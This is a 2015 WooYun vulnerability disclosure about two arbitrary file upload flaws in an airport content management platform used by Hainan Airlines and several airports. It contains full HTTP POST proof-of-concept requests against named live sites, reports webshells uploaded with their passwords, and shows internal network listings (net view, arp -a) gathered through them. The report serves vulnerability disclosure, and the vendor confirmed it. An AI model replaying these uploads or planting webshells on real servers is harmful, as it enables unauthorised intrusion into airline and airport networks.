当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160831

漏洞标题:海南航空某定制管理平台2处通用型任意文件上传打包

相关厂商:海南航空

漏洞作者: 路人甲

提交时间:2015-12-12 22:05

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

2处通用型任意文件上传打包,支持海航,求20rank补贴家用

详细说明:

WooYun: 海南航空某定制管理平台通用型漏洞打包(getshell) 前人漏洞
今天讲的不是fck,fck被修复了,今天讲的是系统内的任意文件上传
以海口美兰国际机场主站为例(ip:221.11.139.164)
http://www.mlairport.com/autoweb/autoweb/ml_index.html

QQ截图20151212202123.png


海航机场网站内容管理平台

QQ截图20151212202335.png


第1处上传#

http://www.mlairport.com/autoportal/AlbumUpload


构造POC

POST http://www.mlairport.com/autoportal/AlbumUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: 
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.mlairport.com
Content-Length: 10179
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="NewFile"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test
-----------------------------7de11c161e01e4--


QQ截图20151212203204.png


返回值有带绝对路径

D:\jboss-4.2.2.GA\server\default\.\deploy\autoportal.ear\autoweb.war\autoweb\fujian\20151212203041_wooyun.jsp


即http://www.mlairport.com/autoweb/autoweb/fujian/20151212203041_wooyun.jsp

QQ截图20151212203306.png


传一个shell试试

http://www.mlairport.com/autoweb/autoweb/fujian/20151212203041_wooyun.jsp


密码woo0yun

QQ截图20151212203348.png


D:\jboss-4.2.2.GA\server\default\.\deploy\autoportal.ear\autoweb.war\autoweb\autoweb\fujian\> net view
服务器名称            注释
-------------------------------------------------------------------------------
\\20YEARSRVHK01                                                                
\\AGRSRVHK01                                                                   
\\BWCSRVHK03                                                                   
\\BWCSRVHK04                                                                   
\\CHGYSRVHK01                                                                  
\\DLRSRVHK01                                                                   
\\DNSSRVHK01                                                                   
\\EAISRVHK03                                                                   
\\ECGSRVHK01                                                                   
\\ECGSRVHK02                                                                   
\\ECGSRVHK05                                                                   
\\ECGSRVHK06                                                                   
\\ECGSRVHK07                                                                   
\\ECGSRVHK08                                                                   
\\EDGE                                                                         
\\EDGE2                                                                        
\\EDGEHK03                                                                     
\\EFBAPPSRVHK01                                                                
\\EFBAPPSRVHK02                                                                
\\EGRPSRVHK01                                                                  
\\EHMOBILESRVHK01                                                              
\\FFPSRVHK02                                                                   
\\FTMSWEBSRVHK01                                                               
\\GASRVHK01                                                                    
\\GCBSRVHK02                                                                   
\\GROSRVHK03                                                                   
\\GROSRVHK04                                                                   
\\GTFVSRVHK01                                                                  
\\GTFVSRVHK01_BAK                                                              
\\HELPSRVHK01                                                                  
\\HNAIR-1485DCBA0                                                              
\\HNAIR-19DDE6F9F                                                              
\\HNAIR-2847999AA                                                              
\\HNAIR-315575FF0                                                              
\\HNAIR-619B2682B                                                              
\\HNAIR-6293EC6FC                                                              
\\HNAIR-764E11C03                                                              
\\HNAIR-8277FEBE4                                                              
\\HNAIR-8B244A893                                                              
\\HNAIR-A490FF226                                                              
\\HNAIR-CC28EB467                                                              
\\HNAIR-E55CA2284                                                              
\\HNAIR-EF037F934                                                              
\\HNAIR-MEILAN                                                                 
\\HNAREAL                                                                      
\\HWOPCSRVHK01                                                                 
\\HWWEBSRVHK01                                                                 
\\IECSRVHK01                                                                   
\\INTSRVHK01                                                                   
\\INTSRVHK02                                                                   
\\JWGLSRVHK01                                                                  
\\LYEDSRVHK01                                                                  
\\LYEDSRVHK02                                                                  
\\LYTMSRVHK02                                                                  
\\MOBILEESBSERVER                                                              
\\MONITOR01                                                                    
\\PHWSRVHK01                                                                   
\\PPMSRVHK02                                                                   
\\SCB_SFTP                                                                     
\\SMG4SRVHK04                                                                  
\\SMSSRVHK03                                                                   
\\SSOSRVHK01                                                                   
\\SSOSRVHK04           ssosrvhk04                                              
\\TICSRVHK02                                                                   
\\VMW-BDTWEB                                                                   
\\VMW-GZWXH                                                                    
\\WEIXIN-PLAT                                                                  
\\WIN-6LJ8ESOHO31                                                              
\\WIN-N5QNAF0JSM5                                                              
\\YWXTWEB                                                                      
\\ZXWEBSRVHK01                                                                 
命令成功完成。
系统找不到指定的路径。
D:\jboss-4.2.2.GA\bin\> arp -a
Interface: 10.1.1.45 --- 0x10003
  Internet Address      Physical Address      Type
  10.1.1.1              00-1f-9e-bc-ad-a6     dynamic   
  10.1.1.151            00-50-56-89-00-86     dynamic   
  10.1.1.228            18-a9-05-72-69-58     dynamic


可内网你懂的

QQ截图20151212203455.png


第二处上传#

http://www.mlairport.com/autoportal/ImageUpload


构造POC

POST http://www.mlairport.com/autoportal/ImageUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: 
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.mlairport.com
Content-Length: 10175
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="file"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test1
-----------------------------7de11c161e01e4--


QQ截图20151212203910.png


返回值有带路径,但是需要注意,路径返回有错,少了个/
正确路径是fujian\big\*.jsp

http://www.mlairport.com/autoweb/autoweb/fujian/big/20151212203744_wooyun.jsp


QQ截图20151212204038.png

漏洞证明:

其它案例
宜昌三峡机场http://www.sanxiaairport.com/

QQ截图20151212204325.png


我直接传jsp测试

QQ截图20151212204425.png


POST http://www.sanxiaairport.com/autoportal/AlbumUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: 
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.sanxiaairport.com
Content-Length: 219
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="NewFile"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test
-----------------------------7de11c161e01e4--


第一处上传的测试jsp文本(文本内容为wooyun test)http://www.sanxiaairport.com/autoweb/autoweb/fujian/20151212204207_wooyun.jsp

QQ截图20151212204538.png


第一处上传的测试jsp文本(文本内容为wooyun test1)
第二处上传

POST http://www.sanxiaairport.com/autoportal/ImageUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: 
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.sanxiaairport.com
Content-Length: 217
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="file"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test1
-----------------------------7de11c161e01e4--


QQ截图20151212204806.png


http://www.sanxiaairport.com/autoweb/autoweb/fujian/big/20151212204550_wooyun.jsp

QQ截图20151212204846.png


传个一句话
http://www.sanyaairport.com/autoweb/autoweb/fujian/big/20151212205457_wooyun.jsp
密码:pandas

QQ截图20151212205803.png


其它的案例

http://202.100.200.73/autoportal/LoginForm.jsp
虽然提示无权限访问,但上传照旧无压力


QQ截图20151212205935.png


上传文本
http://202.100.200.73/autoweb/autoweb/fujian/20151212205827_wooyun.jsp

QQ截图20151212210121.png


QQ截图20151212210244.png


http://202.100.200.73/autoweb/autoweb/fujian/big/20151212210029_wooyun.jsp

QQ截图20151212210319.png


http://202.100.200.203/autoportal/LoginForm.jsp


QQ截图20151212210626.png


QQ截图20151212210724.png


http://202.100.200.203/autoweb/autoweb/fujian/big/20151212210604_wooyun.jsp

QQ截图20151212210803.png


QQ截图20151212210912.png


http://202.100.200.203/autoweb/autoweb/fujian/20151212210753_wooyun.jsp

QQ截图20151212210929.png


http://www.mzlairport.net(ip:114.251.243.65)

QQ截图20151212211114.png


QQ截图20151212211231.png


http://www.mzlairport.net/autoweb/autoweb/fujian/20151212211020_wooyun.jsp

QQ截图20151212211307.png


QQ截图20151212211353.png


http://www.mzlairport.net/autoweb/autoweb/fujian/big/20151212211146_wooyun.jsp

QQ截图20151212211418.png


以上

修复方案:

上传点过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-14 09:26

厂商回复:

非常感谢,我们会立即安排修复工作。

最新状态:

暂无